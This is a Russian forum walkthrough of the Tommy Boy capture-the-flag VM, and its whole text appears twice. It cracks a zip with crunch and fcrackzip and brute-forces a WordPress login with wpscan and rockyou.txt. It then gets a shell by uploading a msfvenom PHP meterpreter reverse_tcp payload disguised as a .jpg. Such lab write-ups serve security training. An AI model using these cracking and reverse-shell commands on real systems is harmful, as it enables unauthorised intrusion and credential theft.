Vander
02.10.2016, 15:37
Итак, продолжаем разгадывать секреты в CTF Hack The Tommy Boy VM.
В прошлой части – ссылка (https://forum.antichat.xyz/threads/1618019/), мы остановились на том, что при попытке просмотреть содержимое папки на сервере, по адресу - http://172.16.0.129:8008/NickIzL33t нас поджидало такое сообщение.
https://forum.antichat.xyz/attachments/28941267/img_04c7cb7798.png
Ищем надстройку в Firefox под названием “User Agent Switcher”, затем устанавливаем ее.
https://forum.antichat.xyz/attachments/28941267/img_8525d2b880.png
Возвращаемся на страницу сервера и открываем Tools > Default User Agent > Iphone3.
https://forum.antichat.xyz/attachments/28941267/img_3ea6d8172b.png
После этого сообщение изменяется на следующее:
https://forum.antichat.xyz/attachments/28941267/img_09c7142a2b.png
Для того чтобы обнаружить скрытый файл на сервере будем использовать программу DirBuster предустановленную в Kali linux. Запустим ее с такими параметрами:
https://forum.antichat.xyz/attachments/28941267/img_b182d61a9e.png
В дополнительных опциях укажем:
https://forum.antichat.xyz/attachments/28941267/img_9036c602a0.png
Запускаем сканирование. В результате находим файл под названием fallon1.html. Он как раз нам и нужен.
https://forum.antichat.xyz/attachments/28941267/img_6583524c24.png
Теперь обратимся к серверу по адресу: 192.168.0.107:8008/NickIzL33t/fallon1.html
https://forum.antichat.xyz/attachments/28941267/img_1c08fb49ea.png
· Теперь у нас есть Третий Флаг – Flag Data: TinyHead
· Подсказки
https://forum.antichat.xyz/attachments/28941267/img_1c85d15839.png
· И архив, который необходимо скачать.
Сохраняем его себе. Попытка открыть его не увенчалась успехом, файл просит пароль:
https://forum.antichat.xyz/attachments/28941267/img_700ad01cbd.png
Для взлома пароля предлагаю использовать crunch. Тоже предустановленный в Кали, подробнее о нем здесь - https://codeby.net/blogs/crunch-generator-parolej-osnovy-ispolzovanija-i-prakticheskie-primery/
Запустим его с параметрами, на которые нам указали в файле с подсказками:
> crunch 13 13 -t bev,%%@@^1995 -o lists.txt
https://forum.antichat.xyz/attachments/28941267/img_ecbed3943f.png
На выходе получаем словарь с паролями, к которому применим программу fcrackzip, запускаем ее с параметрами:
> fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip
https://forum.antichat.xyz/attachments/28941267/img_52fed24911.png
Через несколько минут, получаем искомый пароль. Используем его для открытия файла в архиве.
https://forum.antichat.xyz/attachments/28941267/img_791aa3bb07.png
Теперь, для того, чтобы найти пароль четвертого пользователя, будем использовать wpscan, к тому же, здесь есть подсказка, она указывает на известную песню группы Queen. Не вдаваясь в подробности, скажу, что имелась в виду, песня «We Will Rock You» являясь отсылкой к словарю паролей в Kali Linux rockyou.txt, его мы и будем использовать.
> wpscan -- urlhttp://192.168.0.110/prehistoricforest/wp-login.php --wordlists /usr/share/wordlists/rockyou.txt--username tom --wp-content-dir /wp-content
https://forum.antichat.xyz/attachments/28941267/img_9b25b2e9d3.png
Окончания брутфорса я так и не дождался, т.к. wpscan сообщил, что получил неизвестный ответ при попытке использовать пароль tomtom1. Полагаю это связано с проблемой с самой VM, т.к. после, я долго не мог зайти по этому логину/паролю. В общем, логинимся в системе, используя полученные учетные данные.
https://forum.antichat.xyz/attachments/28941267/img_b999c90d0c.png
Видим следующую замечательную подсказку про SSH. Попробуем обратиться к серверу по SSH, используя недостающую часть пароля - 1938!!
https://forum.antichat.xyz/attachments/28941267/img_ac2c0c9e73.png
Далее с помощью команды ls –lsaосмотримся:
https://forum.antichat.xyz/attachments/28941267/img_ecd57b334b.png
Открываем el-flag-numero-quadro.txt Четвертый Флаг у нас. Помимо флага необходимо обратить внимание на файл callahanbak.bak, так как наша задача восстановить работу сайта воспользуемся этим бэкапом, таким образом:
https://forum.antichat.xyz/attachments/28941267/img_46b539cba5.png
Заходим на сайт Callahan Auto по адресу:
https://forum.antichat.xyz/attachments/28941267/img_443dca6111.png
Сайт успешно поднят, но нам не хватает Пятого Флага. Один из вариантов приблизиться к его получению, это посмотреть исходный код страницы по адресу:
https://forum.antichat.xyz/attachments/28941267/img_9e211c19da.png
Выделенная строка, указывает на то, что есть возможность загрузить полезную нагрузку в виде изображения в директорию P4TCH_4D4M. Создадим ее, используя msfvenom.
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw
https://forum.antichat.xyz/attachments/28941267/img_c6778bfbcf.png
Скопируем полученный код как на скриншоте, затем поместим его в файл, прописав ему расширение .jpg. Сохраняем и загружаем его на сервер, чтобы сделать это откроем в браузере страницу по адресу – 192.168.0.110:8008/NickIzL33t//P4TCH_4D4MS/uploads.
Еще запустим msfconsoleс такими параметрами:
https://forum.antichat.xyz/attachments/28941267/img_4294f73af4.png
Теперь необходимо переименовать файл в .php, для этого перейдем на сервере в папку /uploads.
> cd /var/thatsg0nnaleavemark/NickIzL33t/P4TCH_4D4MS/uploads
Переименуем файл:
> mv 2.php.jpg 2.php
https://forum.antichat.xyz/attachments/28941267/img_6e7141c116.png
Теперь, для получения сессии meterpreter, запустим выполнение файла 2.php.
Для этого переходим в браузере по адресу как на скриншоте ниже:
https://forum.antichat.xyz/attachments/28941267/img_5184cbc375.png
Пришло время забрать Пятый Флаг, переходим в окно с сессией и вводим команду shell,
команда whoami покажет, что мы в системе под www-data, теперь можно прочесть содержимое файла 5.txt.
https://forum.antichat.xyz/attachments/28941267/img_0adb3918dd.png
Теперь у нас есть все пять частей пароля, соберем их воедино - B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack.
Воспользуемся им для распаковки архива содержащегося в папке Большого Тома – LOOT.ZIP.
> cd ~
https://forum.antichat.xyz/attachments/28941267/img_c451cdc4f7.png
На этом прохождение Tommy Boy VM можно считать оконченным.
Спасибо за внимание.
В прошлой части – ссылка (https://forum.antichat.xyz/threads/1618019/), мы остановились на том, что при попытке просмотреть содержимое папки на сервере, по адресу - http://172.16.0.129:8008/NickIzL33t нас поджидало такое сообщение.
https://forum.antichat.xyz/attachments/28941267/img_04c7cb7798.png
Ищем надстройку в Firefox под названием “User Agent Switcher”, затем устанавливаем ее.
https://forum.antichat.xyz/attachments/28941267/img_8525d2b880.png
Возвращаемся на страницу сервера и открываем Tools > Default User Agent > Iphone3.
https://forum.antichat.xyz/attachments/28941267/img_3ea6d8172b.png
После этого сообщение изменяется на следующее:
https://forum.antichat.xyz/attachments/28941267/img_09c7142a2b.png
Для того чтобы обнаружить скрытый файл на сервере будем использовать программу DirBuster предустановленную в Kali linux. Запустим ее с такими параметрами:
https://forum.antichat.xyz/attachments/28941267/img_b182d61a9e.png
В дополнительных опциях укажем:
https://forum.antichat.xyz/attachments/28941267/img_9036c602a0.png
Запускаем сканирование. В результате находим файл под названием fallon1.html. Он как раз нам и нужен.
https://forum.antichat.xyz/attachments/28941267/img_6583524c24.png
Теперь обратимся к серверу по адресу: 192.168.0.107:8008/NickIzL33t/fallon1.html
https://forum.antichat.xyz/attachments/28941267/img_1c08fb49ea.png
· Теперь у нас есть Третий Флаг – Flag Data: TinyHead
· Подсказки
https://forum.antichat.xyz/attachments/28941267/img_1c85d15839.png
· И архив, который необходимо скачать.
Сохраняем его себе. Попытка открыть его не увенчалась успехом, файл просит пароль:
https://forum.antichat.xyz/attachments/28941267/img_700ad01cbd.png
Для взлома пароля предлагаю использовать crunch. Тоже предустановленный в Кали, подробнее о нем здесь - https://codeby.net/blogs/crunch-generator-parolej-osnovy-ispolzovanija-i-prakticheskie-primery/
Запустим его с параметрами, на которые нам указали в файле с подсказками:
> crunch 13 13 -t bev,%%@@^1995 -o lists.txt
https://forum.antichat.xyz/attachments/28941267/img_ecbed3943f.png
На выходе получаем словарь с паролями, к которому применим программу fcrackzip, запускаем ее с параметрами:
> fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip
https://forum.antichat.xyz/attachments/28941267/img_52fed24911.png
Через несколько минут, получаем искомый пароль. Используем его для открытия файла в архиве.
https://forum.antichat.xyz/attachments/28941267/img_791aa3bb07.png
Теперь, для того, чтобы найти пароль четвертого пользователя, будем использовать wpscan, к тому же, здесь есть подсказка, она указывает на известную песню группы Queen. Не вдаваясь в подробности, скажу, что имелась в виду, песня «We Will Rock You» являясь отсылкой к словарю паролей в Kali Linux rockyou.txt, его мы и будем использовать.
> wpscan -- urlhttp://192.168.0.110/prehistoricforest/wp-login.php --wordlists /usr/share/wordlists/rockyou.txt--username tom --wp-content-dir /wp-content
https://forum.antichat.xyz/attachments/28941267/img_9b25b2e9d3.png
Окончания брутфорса я так и не дождался, т.к. wpscan сообщил, что получил неизвестный ответ при попытке использовать пароль tomtom1. Полагаю это связано с проблемой с самой VM, т.к. после, я долго не мог зайти по этому логину/паролю. В общем, логинимся в системе, используя полученные учетные данные.
https://forum.antichat.xyz/attachments/28941267/img_b999c90d0c.png
Видим следующую замечательную подсказку про SSH. Попробуем обратиться к серверу по SSH, используя недостающую часть пароля - 1938!!
https://forum.antichat.xyz/attachments/28941267/img_ac2c0c9e73.png
Далее с помощью команды ls –lsaосмотримся:
https://forum.antichat.xyz/attachments/28941267/img_ecd57b334b.png
Открываем el-flag-numero-quadro.txt Четвертый Флаг у нас. Помимо флага необходимо обратить внимание на файл callahanbak.bak, так как наша задача восстановить работу сайта воспользуемся этим бэкапом, таким образом:
https://forum.antichat.xyz/attachments/28941267/img_46b539cba5.png
Заходим на сайт Callahan Auto по адресу:
https://forum.antichat.xyz/attachments/28941267/img_443dca6111.png
Сайт успешно поднят, но нам не хватает Пятого Флага. Один из вариантов приблизиться к его получению, это посмотреть исходный код страницы по адресу:
https://forum.antichat.xyz/attachments/28941267/img_9e211c19da.png
Выделенная строка, указывает на то, что есть возможность загрузить полезную нагрузку в виде изображения в директорию P4TCH_4D4M. Создадим ее, используя msfvenom.
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw
https://forum.antichat.xyz/attachments/28941267/img_c6778bfbcf.png
Скопируем полученный код как на скриншоте, затем поместим его в файл, прописав ему расширение .jpg. Сохраняем и загружаем его на сервер, чтобы сделать это откроем в браузере страницу по адресу – 192.168.0.110:8008/NickIzL33t//P4TCH_4D4MS/uploads.
Еще запустим msfconsoleс такими параметрами:
https://forum.antichat.xyz/attachments/28941267/img_4294f73af4.png
Теперь необходимо переименовать файл в .php, для этого перейдем на сервере в папку /uploads.
> cd /var/thatsg0nnaleavemark/NickIzL33t/P4TCH_4D4MS/uploads
Переименуем файл:
> mv 2.php.jpg 2.php
https://forum.antichat.xyz/attachments/28941267/img_6e7141c116.png
Теперь, для получения сессии meterpreter, запустим выполнение файла 2.php.
Для этого переходим в браузере по адресу как на скриншоте ниже:
https://forum.antichat.xyz/attachments/28941267/img_5184cbc375.png
Пришло время забрать Пятый Флаг, переходим в окно с сессией и вводим команду shell,
команда whoami покажет, что мы в системе под www-data, теперь можно прочесть содержимое файла 5.txt.
https://forum.antichat.xyz/attachments/28941267/img_0adb3918dd.png
Теперь у нас есть все пять частей пароля, соберем их воедино - B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack.
Воспользуемся им для распаковки архива содержащегося в папке Большого Тома – LOOT.ZIP.
> cd ~
https://forum.antichat.xyz/attachments/28941267/img_c451cdc4f7.png
На этом прохождение Tommy Boy VM можно считать оконченным.
Спасибо за внимание.